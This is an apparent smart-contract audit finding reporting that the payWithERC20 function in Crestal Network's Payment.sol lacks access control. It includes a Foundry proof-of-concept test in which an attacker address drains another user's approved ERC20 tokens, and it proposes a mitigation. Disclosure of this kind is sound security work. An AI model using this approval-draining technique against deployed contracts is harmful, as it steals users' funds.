Tart Watermelon Tortoise

High

# Permissionless payWithERC20 lead anyone to steal allowed transfer of ERC20 token from others to their own address

## Summary

The missing permission to call [payWithERC20](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L32) function from file `Payment.sol` could lead anyone to drain the whitelisted ERC20 to themself. 

Bad actor can listen to allow sign/tx of an ERC20 token to the contract, and then they could directly send the allowed amount of token to themself. User can lost all the fund they are going to use for this contract.

## Steps to Reproduce

1. User needs to approve the contract to send ERC20 from the user address to somewhere else with a specific amount, 100 USDC
2. Malicious actor send the approved ERC20 token transfer from User to malicious address by calling `payWithERC20`

## POC

```solidity
function test_drainERC20FromOtherUser() public {
        // set 2 users: user and attacker
        address user = address(0x1);
        address attacker = address(0x2);

        // mint tokens to the user
        uint256 userTokenAmount = 100 * 10 ** 18;
        mockToken.mint(user, userTokenAmount);

        // check if user has 100 tokens and attacker has 0 tokens
        assertEq(mockToken.balanceOf(user), userTokenAmount);
        assertEq(mockToken.balanceOf(attacker), 0);

        // user whitelist the blueprint contract to transfer tokens on their behalf
        vm.prank(user);
        mockToken.approve(address(blueprint), userTokenAmount);
        vm.stopPrank();

        // attacker calls the blueprint contract to transfer tokens from the user
        vm.prank(attacker);
        blueprint.payWithERC20(address(mockToken), userTokenAmount, user, attacker);
        vm.stopPrank();

        // check if user has 0 tokens and attacker has 100 tokens
        assertEq(mockToken.balanceOf(user), 0);
        assertEq(mockToken.balanceOf(attacker), userTokenAmount);
    }
```

Transaction should fail and user token should remain 100. But when we run the test, transaction succeed and user lost 100 of their token, and attacker gain 100 token.

## Mitigation

Function should be internal or add permission or whitelisted address who could call this function